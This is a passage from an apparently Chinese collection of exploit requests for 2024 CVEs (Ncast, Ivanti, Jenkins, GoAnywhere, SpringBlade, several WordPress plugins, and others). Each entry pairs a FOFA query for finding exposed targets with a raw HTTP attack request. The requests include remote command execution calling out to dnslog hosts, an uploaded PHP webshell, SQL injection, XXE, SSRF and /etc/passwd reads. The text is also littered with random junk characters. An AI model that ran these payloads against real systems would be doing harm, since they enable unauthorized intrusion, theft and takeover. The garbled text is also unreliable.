Content-Length: 121/ b' o+ v; _. r' @6 r$ }0 A% c8 [$ U
Accept: */*) h/ y K m9 r
Accept-Encoding: gzip, deflate2 \' m7 W+ n* ]# F5 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# v' ^7 I! T5 a- K
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ n9 A& F9 O% `3 B
X-Requested-With: XMLHttpRequest$ H) H; Q$ t9 z- H# I6 V5 F2 O
* J5 ~6 M, g/ Tid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
, Z' W' [: |6 V6 ?$ V B1 Z
% c% ?/ k+ d( r7 y7 E1 U, v: N1 W" s
/ }- Z! u+ Y, @6 r) B( U5 K99. Ncast盈可视高清智能录播系统busiFacade RCE1 Q+ y" ^3 @# S& G% C4 M$ H% j
CVE-2024-0305; N" v: v% N$ G! A: V
FOFA:app="Ncast-产品" && title=="高清智能录播系统"; o) O4 M& W' ]9 ~
POST /classes/common/busiFacade.php HTTP/1.1; `* P6 y/ }+ N, b3 ^& f
Host: 192.168.40.130:80805 [5 V* I) m$ G: h2 I) @% h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ n8 Z$ g x @4 pConnection: close( P/ g# e0 ~4 g) c- a
Content-Length: 154
4 Q0 \2 t+ }1 q0 J D( zAccept: */*
# L }+ [; a% O: z% e u7 CAccept-Encoding: gzip, deflate
9 A% O* L0 G1 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% Y- v; c- n- F$ `) @- V. u
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ A$ e, T7 K) S, h" z, s
X-Requested-With: XMLHttpRequest2 Z4 ?+ ?3 ^0 ~: R; X6 e) }
/ z) W" S' A/ R0 p; f2 s' y0 [
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 b- y) i' J- l+ Z
0 v9 D, B/ H0 D! x: g& C7 R0 i* m
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传, T6 o, j1 @: V1 I, L
CVE-2024-0352. H* P/ b; `1 M3 U2 X& b
FOFA:icon_hash="874152924"
6 h2 n9 z# C# L g9 G" `POST /api/file/formimage HTTP/1.1
- C U, i! v) t1 @Host: 192.168.40.130! r: ]: T, E. L. @; ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
1 v' t% G* |5 y5 uConnection: close: H2 o( I" |. x. N. W, `
Content-Length: 201
/ ^/ v% U* |$ A/ s+ A# | v' L; BContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei( \* [+ s9 M, U- i1 ]+ y$ z
Accept-Encoding: gzip
% @6 m4 e! A& g s% u- D4 j1 a
: Q/ l( d3 J) Y4 ^9 F+ |: U------WebKitFormBoundarygcflwtei
5 V' _, M4 x) @' \Content-Disposition: form-data; name="file";filename="IE4MGP.php"7 `) K1 m" T$ @& a
Content-Type: application/x-php
# z1 R* R; U+ v# G0 E% f. o2 P$ Q6 O+ x6 K' U
2ayyhRXiAsKXL8olvF5s4qqyI2O
+ H' T& ~2 f' X0 [- \+ r0 i1 e( A------WebKitFormBoundarygcflwtei--" u' g0 b& h, y* X( z
5 k! `6 M& y. A) E0 W$ f( m: S% H& L% W& [+ k' \
101. ivanti policy secure-22.6命令注入
* F; G, w4 a/ v- g" k- j$ `CVE-2024-218876 u V' N( K2 f2 B9 Q: F" Y
FOFA:body="welcome.cgi?p=logo"* l% z/ ~, r: C0 r, q6 r" C
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
& H& x0 ]5 Q* b8 yHost: x.x.x.xx.x.x.x
) @% }& T% I, z8 S3 h/ }/ CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 A/ C x1 Z2 f" x& ]
Connection: close; `$ m: B# i6 s: |# O9 F
Accept-Encoding: gzip
9 P \: y7 L q2 j% ?0 g$ C* [& [
/ P7 z. l9 z: I. ~5 }/ N; t; K9 z; r
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ p: Y7 a0 Q( k; B
CVE-2024-21893
, G: d4 w& g% s8 O# d4 W5 k# _FOFA:body="welcome.cgi?p=logo"
& v) O8 I1 v( Y, nPOST /dana-ws/saml20.ws HTTP/1.1
. }8 u. Y* T) z+ h1 o$ E$ jHost: x.x.x.x
& Z C- s: M; f {& X, e( lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 X' m0 O2 P. b) B
Connection: close6 }) j2 M3 |4 X/ t9 a. s
Content-Length: 792
( @; c( {. y8 m% {# h; AAccept-Encoding: gzip
4 C$ H/ z' s" A. N$ d8 `) z1 |5 b% V0 e0 W+ q; C
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
; i& P8 W W- H5 \! F. I
! R* Z4 `, H$ z* G3 B103. Ivanti Pulse Connect Secure VPN XXE: b/ \ z. y. o7 N* b3 ` F
CVE-2024-220240 e9 n0 S g8 Q% x
FOFA:body="welcome.cgi?p=logo"
" e/ O- ?/ g" G/ K" \# nPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
3 ~ a& h* D; c; z+ a' ?$ EHost: 192.168.40.130:111' n1 q E* k2 I6 w: C- R
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: M: h' W: {" C" X: G8 [# l
Connection: close
+ `# R' Z: J- s$ G- dContent-Length: 204
0 ~) q; I) O5 W, I9 ~Content-Type: application/x-www-form-urlencoded7 i7 I) w1 ?0 |- v; L+ Q
Accept-Encoding: gzip
' U, Q/ g1 F& e! `5 g+ G% y! z7 g6 `
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==4 A& d s# f* j- A+ ]# t+ ]3 Y
; q4 k( F l! Y ~; U1 W
3 R! N; Q* ~0 P% q其中SAMLRequest的值是xml文件内容的base64值,xml文件如下, G9 Z' C, ?" a* k }
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ k* w" Z! O- v: z) H" S. t
$ n2 K. \7 D2 V! V
! C8 w, ^: m! m% V" j
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; {/ h, D4 e: t' l6 g3 I0 Q- NCVE-2024-0569
# X# a. O. [ R" j5 v: N+ e; `FOFA:title="TOTOLINK"
9 ^: p& p2 t3 APOST /cgi-bin/cstecgi.cgi HTTP/1.1
# z5 v8 D1 h- A4 P) R2 }Host:192.168.0.13 j5 p e% S- N$ L- V* e1 a6 a
Content-Length:41
' D* T- F4 p# H# ?3 k& |Accept:application/json,text/javascript,*/*;q=0.01% z1 A+ X1 A8 B( ]2 Q- q
X-Requested-with: XMLHttpRequest3 ]+ v/ L/ H- a+ v: Q* A
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.368 w8 m) s4 ?( s
Content-Type: application/x-www-form-urlencoded:charset=UTF-83 t6 a l8 U' F% _9 r$ Y
Origin: http://192.168.0.1" m- m" f* V h0 z- m
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
; U% j' s- U4 FAccept-Encoding:gzip,deflate
$ H |4 C6 v+ d. ^9 n s7 }& BAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
, |% z# }1 q2 N. E, {Connection:close
# w- B9 P1 i0 a* O" Y
8 i( o/ ~+ O/ G. S8 `{9 O, b* Q( B0 D1 z
"topicurl":"getSysStatusCfg",
: `2 J. @" Y- E* Q- L6 R* q; b7 ["token":""
5 f, X- L j1 | p( E}
2 f4 K @) a$ H$ I4 W2 U6 x* L; t, V; a
105. SpringBlade v3.2.0 export-user SQL 注入
. t7 |; }$ w6 E* @2 BFOFA:body="https://bladex.vip"6 q( X! `. s6 Q" }# r7 X
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1* E+ \6 ^$ @+ Z" a6 u( K, d
- n3 k8 e: b0 x, o9 s }106. SpringBlade dict-biz/list SQL 注入
2 Q$ i9 W4 u1 w O5 BFOFA:body="Saber 将不能正常工作"
/ K1 ~4 n* K7 W3 xGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1( j7 k: N1 Z8 g! d& W7 @) [
Host: your-ip
: r6 X3 g9 Y" [0 X) o- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 v( ]+ x# ]% U3 z2 i- f {! QBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
* \; B3 _( u3 h) V( RAccept-Encoding: gzip, deflate- s+ l K0 Z9 v. f; K
Accept-Language: zh-CN,zh;q=0.9
! E' Q$ p0 a8 J4 d7 yConnection: close
4 D9 D% `: `3 \4 E
: J: W- ?: A% O7 e% c! Z/ }' ~9 O$ }5 j! }; R
107. SpringBlade tenant/list SQL 注入 O4 n* V. T. L0 b' F# g! V
FOFA:body="https://bladex.vip"
9 D B) C# N0 i; t7 i! ]GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! ]+ [0 v- X8 h/ o) P4 q r' }. o# k+ _) cHost: your-ip. C1 Y) x7 w8 J% A: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 G) D0 }$ R2 k3 H! D. s2 |
Blade-Auth:替换为自己的
& ?" ]4 v$ W9 G) rConnection: close
4 m: W" ~, ?; C! e3 h
2 e4 O0 \( @) ]7 o% J+ u9 C9 x
' H0 P4 E/ z' U$ O; h108. D-Tale 3.9.0 SSRF
8 ?5 T8 e; r5 h. e' uCVE-2024-21642( O' d! O0 O8 _- u9 Z1 q
FOFA:"dtale/static/images/favicon.png"1 u$ j3 T) u! Y9 T, D- `+ `
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1$ c# {* s6 e: {5 S4 v
Host: your-ip
1 e9 x# C3 j6 }Accept: application/json, text/plain, */*+ [3 n5 ], X9 X* r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 l, B; l0 K/ H6 }; G3 x
Accept-Encoding: gzip, deflate
2 X( a0 V% K6 U6 aAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 U# @5 }! B+ c- y$ r: S; `
Connection: close
0 a& ], x8 p! M1 ]: z7 f: B* B/ T7 v8 F1 _' I
1 h/ T9 o3 X, X' h4 G% P& s" X3 N109. Jenkins CLI 任意文件读取
8 ` w) c2 i. ECVE-2024-23897
9 P: o+ F8 W9 \! g. E" B9 N, IFOFA:header="X-Jenkins"
+ x4 ?7 \7 r3 O1 }7 s& e- `POST /cli?remoting=false HTTP/1.1: ^ j# s4 s6 p5 p/ f( \$ ?
Host:7 T- n) g8 G. n5 o1 J
Content-type: application/octet-stream' I& \# w- l2 o& z) r9 Y2 G; G
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 ]8 n' P, A4 t: ?$ U8 T
Side: upload
: W6 L! q* u) M$ |# a+ c; Q$ RConnection: keep-alive3 T& V7 j% b. w* E
Content-Length: 163
* @7 g6 \$ e: Q, x# F1 Y2 {. b! Q( h1 e+ u* d# Y7 V
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
4 a* a" D3 H2 F. p6 n7 D* z; G7 c4 L; X0 D! `4 z
9 W! g g5 W5 I6 f- Y. f: kPOST /cli?remoting=false HTTP/1.1, Z( x' ], b4 q* z. O2 v2 M$ L
Host:" s2 V' X* j) Q0 h' j& _
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& M1 ^4 n+ g! f
download
! i. n% H( \8 NContent-Type: application/x-www-form-urlencoded
" q3 k) {# n! ?, K% Q. c5 p6 \1 b( OContent-Length: 0# ?9 d( r* h8 q% [5 a6 g4 j
0 { }; c8 e% o* }
$ P* M$ S& T/ q& h
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' V4 B) n+ b8 F; {: j
java -jar jenkins-cli.jar help
; r6 L e: J8 G: F; p# e[COMMAND]: w8 w) j# X/ j. @- _
Lists all the available commands or a detailed description of single command.- b1 f3 v4 r& F
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash), j( m6 I9 Z* P+ Q& f
3 q' C# X% j9 P0 b; V$ E9 E) o9 |
# u I6 k) i, w8 M; _+ x
110. Goanywhere MFT 未授权创建管理员! s% k- }' ]* E5 {- T4 ~/ x/ u
CVE-2024-0204 t$ H2 I2 ? M6 G( w {9 F
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"! j! I; X/ {' x; P S: @1 w/ I
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
; X h8 @. d- U5 d7 c# OHost: 192.168.40.130:8000( M$ `2 m) H! z2 _8 w% x; Z+ o
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
5 s& B4 g/ @' m2 E' E/ `* j, NConnection: close
6 M) n d5 s3 ?9 w5 R" ^Accept: */*3 r6 D' E+ @% z( k
Accept-Language: en
% n# C3 @ I. i% k# }/ gAccept-Encoding: gzip) x" h5 J- |+ @7 ~& i$ V
" L- ]' u8 J; N$ f+ m' C9 ~8 m
% P7 e) ^9 R d, @
111. WordPress Plugin HTML5 Video Player SQL注入1 I% d" g5 K+ D# ]' n$ I/ r6 U6 s
CVE-2024-1061
2 O/ x: [1 Q. F; z" s2 OFOFA:"wordpress" && body="html5-video-player"
0 n1 j. |% E# M, @GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
( m* _' q( y- ]/ S$ X* i% n& PHost: 192.168.40.130:112
0 U7 J+ G: G CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 o% Q3 \1 `9 }/ X! Q0 ]! D: f
Connection: close' p! b% R7 c$ ]' h
Accept: */*
+ E3 h. s I. y0 D2 I9 XAccept-Language: en
+ U" p2 i) c) t5 W7 ]( P6 C9 @% NAccept-Encoding: gzip
$ ~& V' b+ z9 y% s" K. t7 {" I: N" d2 S8 Z0 X+ N- w4 j
0 N# A: w0 Y3 t1 h5 O' K0 e# P
112. WordPress Plugin NotificationX SQL 注入4 O- f$ d4 a) }4 O& }
CVE-2024-1698* e& c x$ t) S/ z& R. @) D
FOFA:body="/wp-content/plugins/notificationx"
3 F) e9 W# ^* h1 IPOST /wp-json/notificationx/v1/analytics HTTP/1.17 d! a" r- u2 x
Host: {{Hostname}}
6 V5 o% w: F* [9 OContent-Type: application/json5 a) ?9 }. { [/ n; n8 \. G
- {4 m9 z6 W3 Q' i6 k! y, P% y{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}4 m( `' N; q* y. u/ Y( P- Q% k: J
' w0 r8 g# z, [) J# ?# t
0 w4 i$ _2 W" ]1 O) H4 L7 k. T113. WordPress Automatic 插件任意文件下载和SSRF
: g& B. f' M' i% K" YCVE-2024-27954
1 j& A9 B1 y6 W) f$ PFOFA:"/wp-content/plugins/wp-automatic"" ^2 G% K$ R% Z/ V
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1# A! V6 |8 a6 o
Host: x.x.x.x
6 E' }( Z7 l. f9 [" L, N0 B: hUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36! A$ k1 L3 u: \; x- E* i
Connection: close
y) E/ H3 z2 d1 ]Accept: */*
, E* J: \( f3 ^! O" \- o$ mAccept-Language: en0 K/ d8 j, ]; N6 M5 r N
Accept-Encoding: gzip
" g( c% o4 q. u& P2 w& O( b7 a" p! U+ O+ E( v$ F
: ?2 @+ W' {; t! {+ D
114. WordPress MasterStudy LMS插件 SQL注入
* L6 C* l4 ~6 I8 |+ UFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
4 y6 c9 n9 x- j& Y" \" E4 nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
% ?: ?6 `9 r, S% [1 tHost: your-ip
* F c. n. Q+ K# vUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" P7 b: [( t3 E8 [- i! c
Accept-Charset: utf-8
" @; N' Z( I4 ?% b) rAccept-Encoding: gzip, deflate5 n; W1 l3 ^ B6 J
Connection: close. X3 H: J* d5 h/ L
" F( G; A! G4 A0 R' j, O9 M) C( g
/ {- }6 `; u3 ]2 k8 S, Z115. WordPress Bricks Builder <= 1.9.6 RCE+ l$ v, H! g. f0 R9 |
CVE-2024-25600! [, z' S0 F. e6 c+ B& }
FOFA: body="/wp-content/themes/bricks/"
( h9 ?1 w( I- b. c第一步,获取网站的nonce值) h6 a; [" e A
GET / HTTP/1.1
7 J5 r0 n) p4 S' |Host: x.x.x.x
* \' J8 V& f1 H" x6 y- ~User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
( m1 V& n+ @& y% H1 PConnection: close2 K/ s8 `/ e/ @' S N x$ F/ C, J
Accept-Encoding: gzip
6 y1 w4 c8 A" x8 U* B
. Y, l/ T# R8 U" ]& h
, w1 \) X' ]4 z7 }第二步替换nonce值,执行命令8 m X' O, m$ `& N& i+ c
POST /wp-json/bricks/v1/render_element HTTP/1.1
* l) q6 C8 l! h7 M* V7 nHost: x.x.x.x/ H' P9 a$ l# _5 b C- p) l( Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
* T U" n. z5 Y" K, mConnection: close
8 p6 U# N w# q m' D8 d: I# O& nContent-Length: 356
! z+ a& u! _' ^, W# rContent-Type: application/json; f' @( Z2 `2 [/ G. F# l
Accept-Encoding: gzip
% ~3 \2 D9 K; `8 t. O- h. T V0 B- H# h2 m2 M. ~' Q2 U# L
{4 M7 H$ [4 b4 d+ U) B6 m0 z
"postId": "1",
+ f6 C, Q; G) `5 j# \" ~ "nonce": "第一步获得的值",
' w+ i) |/ t- c- M3 g "element": {! H8 D* t! e$ S$ I# n% x
"name": "container",
7 Y( U) I7 u- O& j/ l "settings": {
0 [# ]3 N* a: ~; {5 q' B, f, j "hasLoop": "true",& S. j! t8 r X4 D+ J# Z
"query": {
5 c8 W* l/ Z( c1 z$ u "useQueryEditor": true,
~+ O" g) m- z! g "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
! N% m6 R5 L. j4 x "objectType": "post"% h' R- t$ s: M$ g `
}
0 h& d9 @* @2 o7 ^4 P) z/ ?* [- t }
! D: D1 l; p$ n+ q }
* G% M# x4 t8 R}
3 i7 z7 u: x+ O+ g/ Y, {0 Z4 C3 k# v& N% ^) X. c' N$ D: H
2 H, I: ]( b y$ \* ?5 t5 v
116. wordpress js-support-ticket文件上传
# O+ L5 J; P# j! {9 [6 FFOFA:body="wp-content/plugins/js-support-ticket"/ g/ Q8 Z! O3 O
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
7 |- ~0 |7 ]) r- ]& G9 b% m2 }# pHost:( c) b$ z. |$ i
Content-Type: multipart/form-data; boundary=--------7670991716 A7 M- i- M r$ R
User-Agent: Mozilla/5.06 j: }7 P% o9 p) G" p1 l
7 D( `7 ]9 P" t: r- {. v
----------767099171
, `! v6 P& z3 G% T e+ G# \9 N3 ^Content-Disposition: form-data; name="action"
9 w n1 J$ F! n, Gconfiguration_saveconfiguration
! y) a# I G- d7 z" Z3 ^----------767099171
; K7 ]" O! y) x+ z- X" t3 k8 d0 {Content-Disposition: form-data; name="form_request"6 Q4 j4 P; l- N0 _4 f, P( ^7 z; @
jssupportticket
3 y) \; S- a" _% t----------767099171, M; z7 ?, A9 `+ T; B
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"( k: [! S7 I9 P+ G' ~% l- f
Content-Type: image/png% [! G/ i _) Y
----------767099171--/ V& a1 e8 q- O! R
" q3 d" \/ G' r0 F+ D6 t
2 e3 r/ T1 U1 L* J4 v/ k& v! _
117. WordPress LayerSlider插件SQL注入' |& |: b: B) z5 g( I
version:7.9.11 – 7.10.08 g8 e$ q& s/ }! s" p( `$ D
FOFA:body="/wp-content/plugins/LayerSlider/"
, \% U0 y0 Z3 u/ m3 AGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" d3 ]2 G) R3 v% x A1 x8 q
Host: your-ip
. i( e. `( ?$ {3 k, fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 u0 o% Q5 j0 G3 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 F. ^$ L" b! r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Z$ _8 f: l* y# n4 Y. z# Z# S# fAccept-Encoding: gzip, deflate, br% k# }4 c% x' z
Connection: close
n; ?7 y' [$ C" P; c: |Upgrade-Insecure-Requests: 1
4 X5 w. W( B! e# G: @
3 e+ k/ g1 D* @, `7 D2 I% a: O/ K* \* n
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传, B7 m* {- ?' P* X1 J+ r
CVE-2024-0939
% S+ x/ j2 M0 z( |, WFOFA:title="Smart管理平台"
1 k' j. v* c3 }! a2 i; n) _POST /Tool/uploadfile.php? HTTP/1.1
6 S, O9 _. i1 z3 M- pHost: 192.168.40.130:84434 ?/ W- C/ c% i/ r7 Q: J3 H
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8! L, I& n: R2 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
2 ?( W7 ^! I: _, ^% U: w) vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 U( u8 Z* N+ c7 ?1 o! i- Q+ M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% v6 ]! L8 [4 L7 J1 r+ ~$ EAccept-Encoding: gzip, deflate6 c* t1 V t4 u. Q- j% f; o
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
+ i$ x6 b% J# T' j& wContent-Length: 405
8 L3 n* Q) o& W( t# JOrigin: https://192.168.40.130:84436 a% c8 X$ p1 h3 z! J; Q* H Y
Referer: https://192.168.40.130:8443/Tool/uploadfile.php+ a( z4 e- X3 \- u
Upgrade-Insecure-Requests: 1
$ F( s4 A2 ]& Z9 `1 T" D4 v# wSec-Fetch-Dest: document0 M+ h: B- \# o$ X, g6 t4 _. T+ X; x
Sec-Fetch-Mode: navigate! c5 z5 \: @( X* U% R1 T
Sec-Fetch-Site: same-origin2 L3 k6 V L C' k" q
Sec-Fetch-User: ?1+ R+ ~4 b2 L8 b% x z& f' @
Te: trailers$ |4 j I1 M; N' p4 k$ B0 H) [: m
Connection: close
! w& B- ]" B$ K' m3 g% z, n0 E1 f+ m6 C" I# I' z
-----------------------------13979701222747646634037182887
+ B U' M% ?) h. o- Z0 ~Content-Disposition: form-data; name="file_upload"; filename="contents.php". r6 f7 _- E4 ~; n
Content-Type: application/octet-stream
3 |9 Z/ y; p H* X, L: W9 v! A& A2 |) ~4 O% @! i
<?php
. z% l9 r0 I8 g* d9 \. S1 v! ^6 D5 tsystem($_POST["passwd"]);7 y/ E% B8 W$ d' B6 z G# ?
?>
/ h4 x) Z: L5 |. T/ V# i& B-----------------------------13979701222747646634037182887. P3 W, `7 m# N6 @. G4 l9 t6 K
Content-Disposition: form-data; name="txt_path"7 c4 K$ K( U4 {; t" c6 j* w* b
, S+ j: D# p$ n4 l
/home/src.php1 a# Y" G7 S* o ^
-----------------------------13979701222747646634037182887--
; J Y+ @3 i+ T: G' \( ]$ Y* I' h( v7 ]) X6 O
; U, r& u; w5 v( M
访问/home/src.php
6 [" r6 a8 Z H, n" S& k m' C6 U2 t0 T
119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 V$ D' s. |8 m6 F( C9 [CVE-2024-1254
5 A7 T2 T4 g3 r( a9 j' HFOFA:title="Smart管理平台"& x! O+ t- G7 F# W( y
先登录进入系统,默认账号密码为admin/admin* \6 Y, u5 J5 A' G2 [9 I
POST /sysmanage/sysmanageajax.php HTTP/1.11
: N; b5 `9 W+ s- v/ {/ AHost: x.x.x.x
& s9 n4 S9 [& w1 A5 Z' a1 GCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee" K" A1 U) N2 c1 l8 d( }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.06 D$ }4 z+ a+ Z; @$ T
Accept: */*$ [$ T' P& y! T) y( u8 R1 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 T, l f# ^8 |* |
Accept-Encoding: gzip, deflate
9 o, c2 ]& c, @7 [" }Content-Type: application/x-www-form-urlencoded;
/ |$ D, R6 p+ e" RContent-Length: 109
$ Z5 P1 ^9 i$ Y( W' Z; q' l# |: rOrigin: https://58.18.133.60:8443
1 z# k9 V" N$ t" TReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php, o/ w% I# M: e* ?& I
Sec-Fetch-Dest: empty. j+ p ^. K; [2 o& m1 y+ I
Sec-Fetch-Mode: cors
" k( J, I9 C3 c+ K/ e0 C6 vSec-Fetch-Site: same-origin7 o& F9 ^3 f. M, d+ l/ `
X-Forwarded-For: 1.1.1.1
